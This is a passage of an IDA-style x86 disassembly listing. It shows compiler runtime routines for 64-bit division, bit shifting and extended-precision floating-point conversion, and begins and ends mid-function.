mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+arg_4]
mov [eax+4], ebx
mov [eax], ebx
jmp short loc_411B18
; ---------------------------------------------------------------------------
loc_411ACC: ; CODE XREF: sub_411A66+52j
; sub_411A66+56j
add ecx, 3C01h
mov [ebp+var_4], ebx
loc_411AD5: ; CODE XREF: sub_411A66+45j
movzx edi, cx
loc_411AD8: ; CODE XREF: sub_411A66+4Cj
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_411B13
loc_411AF4: ; CODE XREF: sub_411A66+ABj
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
add edx, edx
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_411AF4
loc_411B13: ; CODE XREF: sub_411A66+8Cj
mov ecx, [ebp+arg_4]
or ecx, edi
loc_411B18: ; CODE XREF: sub_411A66+64j
pop edi
pop esi
mov [eax+8], cx
pop ebx
leave
retn
sub_411A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B21 proc near ; CODE XREF: sub_410F71+2Ap
; sub_4114C3+2Ap ...
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_8]
push esi
mov [ebp+var_30], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_411A66
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_412E61
mov esi, [ebp+var_30]
mov [ebx+8], eax
movsx eax, [ebp+var_2A]
mov [ebx], eax
movsx eax, [ebp+var_2C]
mov [ebx+4], eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push esi
call sub_407A85
add esp, 24h
test eax, eax
jz short loc_411B9B
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_403209
add esp, 14h
loc_411B9B: ; CODE XREF: sub_411B21+69j
mov ecx, [ebp+var_4]
pop edi
mov [ebx+0Ch], esi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_411B21 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411BB0 proc near ; CODE XREF: sub_41105D+2F7p
; sub_41105D+31Dp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebp
xor edi, edi
xor ebp, ebp
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_411BD4
inc edi
inc ebp
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_411BD4: ; CODE XREF: sub_411BB0+Dj
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_411BF0
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_411BF0: ; CODE XREF: sub_411BB0+2Aj
or eax, eax
jnz short loc_411C1C
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+0Ch+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+0Ch+arg_8]
add edx, ecx
jmp short loc_411C63
; ---------------------------------------------------------------------------
loc_411C1C: ; CODE XREF: sub_411BB0+42j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_411C2A: ; CODE XREF: sub_411BB0+84j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_411C2A
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_411C58
cmp edx, [esp+0Ch+arg_4]
ja short loc_411C58
jb short loc_411C61
cmp eax, [esp+0Ch+arg_0]
jbe short loc_411C61
loc_411C58: ; CODE XREF: sub_411BB0+98j
; sub_411BB0+9Ej
dec esi
sub eax, [esp+0Ch+arg_8]
sbb edx, [esp+0Ch+arg_C]
loc_411C61: ; CODE XREF: sub_411BB0+A0j
; sub_411BB0+A6j
xor ebx, ebx
loc_411C63: ; CODE XREF: sub_411BB0+6Aj
sub eax, [esp+0Ch+arg_0]
sbb edx, [esp+0Ch+arg_4]
dec ebp
jns short loc_411C75
neg edx
neg eax
sbb edx, 0
loc_411C75: ; CODE XREF: sub_411BB0+BCj
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
dec edi
jnz short loc_411C89
neg edx
neg eax
sbb edx, 0
loc_411C89: ; CODE XREF: sub_411BB0+D0j
pop ebp
pop esi
pop edi
retn 10h
sub_411BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411C90 proc near ; CODE XREF: sub_41105D+1EAp
; sub_41105D+23Ep ...
cmp cl, 40h
jnb short loc_411CAA
cmp cl, 20h
jnb short loc_411CA0
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_411CA0: ; CODE XREF: sub_411C90+8j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_411CAA: ; CODE XREF: sub_411C90+3j
xor eax, eax
xor edx, edx
retn
sub_411C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CAF proc near ; CODE XREF: sub_41171B+Ep
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
and eax, 0FFF7FFFFh
and ecx, eax
test ecx, 0FCF0FCE0h
push esi
jz short loc_411CF9
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_411CDD
push esi
push esi
call sub_413857
pop ecx
pop ecx
mov [edi], eax
loc_411CDD: ; CODE XREF: sub_411CAF+21j
call sub_405B83
push 16h
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_403305
add esp, 14h
mov eax, edi
pop edi
jmp short loc_411D16
; ---------------------------------------------------------------------------
loc_411CF9: ; CODE XREF: sub_411CAF+17j
mov esi, [ebp+arg_0]
test esi, esi
push eax
push [ebp+arg_4]
jz short loc_411D0D
call sub_413857
mov [esi], eax
jmp short loc_411D12
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411CAF+53j
call sub_413857
loc_411D12: ; CODE XREF: sub_411CAF+5Cj
pop ecx
pop ecx
xor eax, eax
loc_411D16: ; CODE XREF: sub_411CAF+48j
pop esi
pop ebp
retn
sub_411CAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D19 proc near ; CODE XREF: sub_41185D+44p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411D83
xor ebx, ebx
xor eax, eax
loc_411D60: ; CODE XREF: sub_411D19+51j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411D73
inc eax
cmp eax, 3
jl short loc_411D60
xor eax, eax
jmp loc_412218
; ---------------------------------------------------------------------------
loc_411D73: ; CODE XREF: sub_411D19+4Bj
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_412218
; ---------------------------------------------------------------------------
loc_411D83: ; CODE XREF: sub_411D19+41j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411DBB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DBB: ; CODE XREF: sub_411D19+9Bj
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411E61
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411DE9
; ---------------------------------------------------------------------------
loc_411DE4: ; CODE XREF: sub_411D19+D6j
cmp [ebp+eax*4+var_20], 0
loc_411DE9: ; CODE XREF: sub_411D19+C9j
jnz short loc_411DF3
inc eax
cmp eax, 3
jl short loc_411DE4
jmp short loc_411E61
; ---------------------------------------------------------------------------
loc_411DF3: ; CODE XREF: sub_411D19:loc_411DE9j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411E0D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411E0D: ; CODE XREF: sub_411D19+EDj
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411E4C
cmp [ebp+arg_0], edx
jmp short loc_411E4A
; ---------------------------------------------------------------------------
loc_411E2F: ; CODE XREF: sub_411D19+143j
test ecx, ecx
jz short loc_411E5E
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411E4C
cmp esi, 1
loc_411E4A: ; CODE XREF: sub_411D19+114j
jnb short loc_411E53
loc_411E4C: ; CODE XREF: sub_411D19+10Fj
; sub_411D19+12Cj
mov [ebp+var_4], 1
loc_411E53: ; CODE XREF: sub_411D19:loc_411E4Aj
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411E2F
loc_411E5E: ; CODE XREF: sub_411D19+118j
mov [ebp+arg_0], ecx
loc_411E61: ; CODE XREF: sub_411D19+B5j
; sub_411D19+D8j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411E81
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411E81: ; CODE XREF: sub_411D19+159j
cmp [ebp+arg_0], 0
jz short loc_411E88
inc ebx
loc_411E88: ; CODE XREF: sub_411D19+16Cj
mov eax, dword_424234
mov ecx, eax
sub ecx, dword_424238
cmp ebx, ecx
jge short loc_411EA6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_4120B3
; ---------------------------------------------------------------------------
loc_411EA6: ; CODE XREF: sub_411D19+17Ej
cmp ebx, eax
jg loc_4120BD
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411ED4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411ED4: ; CODE XREF: sub_411D19+1B4j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411EEF: ; CODE XREF: sub_411D19+201j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411EEF
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411F29: ; CODE XREF: sub_411D19+227j
cmp edx, eax
jl short loc_411F35
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411F3A
; ---------------------------------------------------------------------------
loc_411F35: ; CODE XREF: sub_411D19+212j
and [ebp+edx*4+var_20], 0
loc_411F3A: ; CODE XREF: sub_411D19+21Aj
dec edx
sub ecx, 4
test edx, edx
jge short loc_411F29
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411F69
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F69: ; CODE XREF: sub_411D19+249j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412004
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F8F: ; CODE XREF: sub_411D19+281j
cmp [ebp+eax*4+var_20], 0
loc_411F94: ; CODE XREF: sub_411D19+274j
jnz short loc_411F9E
inc eax
cmp eax, 3
jl short loc_411F8F
jmp short loc_412004
; ---------------------------------------------------------------------------
loc_411F9E: ; CODE XREF: sub_411D19:loc_411F94j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411FB8
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411FB8: ; CODE XREF: sub_411D19+298j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411FD4
cmp edi, edx
jnb short loc_411FDB
loc_411FD4: ; CODE XREF: sub_411D19+2B5j
mov [ebp+arg_0], 1
loc_411FDB: ; CODE XREF: sub_411D19+2B9j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412001
; ---------------------------------------------------------------------------
loc_411FE2: ; CODE XREF: sub_411D19+2E9j
test ecx, ecx
jz short loc_412004
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411FFA
cmp esi, 1
jnb short loc_411FFD
loc_411FFA: ; CODE XREF: sub_411D19+2DAj
xor edi, edi
inc edi
loc_411FFD: ; CODE XREF: sub_411D19+2DFj
mov [ecx], esi
mov ecx, edi
loc_412001: ; CODE XREF: sub_411D19+2C7j
dec eax
jns short loc_411FE2
loc_412004: ; CODE XREF: sub_411D19+263j
; sub_411D19+283j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412024
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412024: ; CODE XREF: sub_411D19+2FCj
mov ecx, dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412045
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412045: ; CODE XREF: sub_411D19+325j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412060: ; CODE XREF: sub_411D19+372j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412060
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41209A: ; CODE XREF: sub_411D19+398j
cmp edx, eax
jl short loc_4120A6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120AB
; ---------------------------------------------------------------------------
loc_4120A6: ; CODE XREF: sub_411D19+383j
and [ebp+edx*4+var_20], 0
loc_4120AB: ; CODE XREF: sub_411D19+38Bj
dec edx
sub ecx, 4
test edx, edx
jge short loc_41209A
loc_4120B3: ; CODE XREF: sub_411D19+188j
push 2
xor ebx, ebx
pop eax
jmp loc_412217
; ---------------------------------------------------------------------------
loc_4120BD: ; CODE XREF: sub_411D19+18Fj
cmp ebx, dword_424230
mov ecx, dword_42423C
jl loc_41217C
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4120F8
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120F8: ; CODE XREF: sub_411D19+3D8j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412113: ; CODE XREF: sub_411D19+425j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412113
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41214D: ; CODE XREF: sub_411D19+44Bj
cmp edx, eax
jl short loc_412159
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41215E
; ---------------------------------------------------------------------------
loc_412159: ; CODE XREF: sub_411D19+436j
and [ebp+edx*4+var_20], 0
loc_41215E: ; CODE XREF: sub_411D19+43Ej
dec edx
sub ecx, 4
test edx, edx
jge short loc_41214D
mov eax, dword_424230
mov ecx, dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_412217
; ---------------------------------------------------------------------------
loc_41217C: ; CODE XREF: sub_411D19+3B0j
mov eax, dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121A4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121A4: ; CODE XREF: sub_411D19+484j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_4121BF: ; CODE XREF: sub_411D19+4D4j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_4121BF
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4121FC: ; CODE XREF: sub_411D19+4FAj
cmp edx, eax
jl short loc_412208
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41220D
; ---------------------------------------------------------------------------
loc_412208: ; CODE XREF: sub_411D19+4E5j
and [ebp+edx*4+var_20], 0
loc_41220D: ; CODE XREF: sub_411D19+4EDj
dec edx
sub ecx, 4
test edx, edx
jge short loc_4121FC
xor eax, eax
loc_412217: ; CODE XREF: sub_411D19+39Fj
; sub_411D19+45Ej
pop esi
loc_412218: ; CODE XREF: sub_411D19+55j
; sub_411D19+65j
push 1Fh
pop ecx
sub ecx, dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_41224D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_412257
; ---------------------------------------------------------------------------
loc_41224D: ; CODE XREF: sub_411D19+525j
cmp ecx, 20h
jnz short loc_412257
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_412257: ; CODE XREF: sub_411D19+532j
; sub_411D19+537j
pop edi
pop ebx
leave
retn
sub_411D19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41225B proc near ; CODE XREF: sub_411903+44p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4122C5
xor ebx, ebx
xor eax, eax
loc_4122A2: ; CODE XREF: sub_41225B+51j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4122B5
inc eax
cmp eax, 3
jl short loc_4122A2
xor eax, eax
jmp loc_41275A
; ---------------------------------------------------------------------------
loc_4122B5: ; CODE XREF: sub_41225B+4Bj
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_41275A
; ---------------------------------------------------------------------------
loc_4122C5: ; CODE XREF: sub_41225B+41j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_4122FD
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4122FD: ; CODE XREF: sub_41225B+9Bj
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_4123A3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_41232B
; ---------------------------------------------------------------------------
loc_412326: ; CODE XREF: sub_41225B+D6j
cmp [ebp+eax*4+var_20], 0
loc_41232B: ; CODE XREF: sub_41225B+C9j
jnz short loc_412335
inc eax
cmp eax, 3
jl short loc_412326
jmp short loc_4123A3
; ---------------------------------------------------------------------------
loc_412335: ; CODE XREF: sub_41225B:loc_41232Bj
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41234F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41234F: ; CODE XREF: sub_41225B+EDj
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_41238E
cmp [ebp+arg_0], edx
jmp short loc_41238C
; ---------------------------------------------------------------------------
loc_412371: ; CODE XREF: sub_41225B+143j
test ecx, ecx
jz short loc_4123A0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_41238E
cmp esi, 1
loc_41238C: ; CODE XREF: sub_41225B+114j
jnb short loc_412395
loc_41238E: ; CODE XREF: sub_41225B+10Fj
; sub_41225B+12Cj
mov [ebp+var_4], 1
loc_412395: ; CODE XREF: sub_41225B:loc_41238Cj
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_412371
loc_4123A0: ; CODE XREF: sub_41225B+118j
mov [ebp+arg_0], ecx
loc_4123A3: ; CODE XREF: sub_41225B+B5j
; sub_41225B+D8j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4123C3
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4123C3: ; CODE XREF: sub_41225B+159j
cmp [ebp+arg_0], 0
jz short loc_4123CA
inc ebx
loc_4123CA: ; CODE XREF: sub_41225B+16Cj
mov eax, dword_42424C
mov ecx, eax
sub ecx, dword_424250
cmp ebx, ecx
jge short loc_4123E8
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_4125F5
; ---------------------------------------------------------------------------
loc_4123E8: ; CODE XREF: sub_41225B+17Ej
cmp ebx, eax
jg loc_4125FF
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412416
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412416: ; CODE XREF: sub_41225B+1B4j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412431: ; CODE XREF: sub_41225B+201j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412431
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41246B: ; CODE XREF: sub_41225B+227j
cmp edx, eax
jl short loc_412477
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41247C
; ---------------------------------------------------------------------------
loc_412477: ; CODE XREF: sub_41225B+212j
and [ebp+edx*4+var_20], 0
loc_41247C: ; CODE XREF: sub_41225B+21Aj
dec edx
sub ecx, 4
test edx, edx
jge short loc_41246B
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4124AB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4124AB: ; CODE XREF: sub_41225B+249j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412546
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_4124D6
; ---------------------------------------------------------------------------
loc_4124D1: ; CODE XREF: sub_41225B+281j
cmp [ebp+eax*4+var_20], 0
loc_4124D6: ; CODE XREF: sub_41225B+274j
jnz short loc_4124E0
inc eax
cmp eax, 3
jl short loc_4124D1
